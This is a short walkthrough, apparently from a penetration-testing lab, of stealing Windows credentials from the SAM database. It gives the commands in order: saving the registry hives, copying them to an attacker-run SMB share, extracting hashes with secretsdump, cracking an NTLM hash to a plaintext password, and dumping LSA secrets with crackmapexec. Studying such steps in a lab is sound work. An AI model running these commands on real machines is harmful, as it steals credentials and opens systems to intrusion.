Attacking SAM

June 05, 2024

First we will save the sam, system, security from the hklm

reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save

Then in the attacker machine we will create a directory so that the files we are getting will be going to be transferred here.

We will specify the name of the share that we want. Any name would be good but I just named it "SamData"

mkdir TryShare
sudo impacket-smbserver -smb2support SamData TryShare

After that we will move the saved files that we created earlier to the attacker machine.

move sam.save \\10.10.15.238\SamData
move security.save \\10.10.15.238\SamData
move system.save \\10.10.15.238\SamData

We can see that the files is here

Then we can just extract data from the sam databases since we have the system.save file

sudo impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL

We can just use some online decrypt for the password NTLM hash of user ITbackdoor since it is pretty simple

User - ITbackdoor

c02478537b9727d391bc80011c2e2321:matrix

Then just dump the lsa from smb

# It will dump the lsa
poetry run crackmapexec smb 10.129.202.137 --local-auth -u ITbackdoor -p matrix --lsa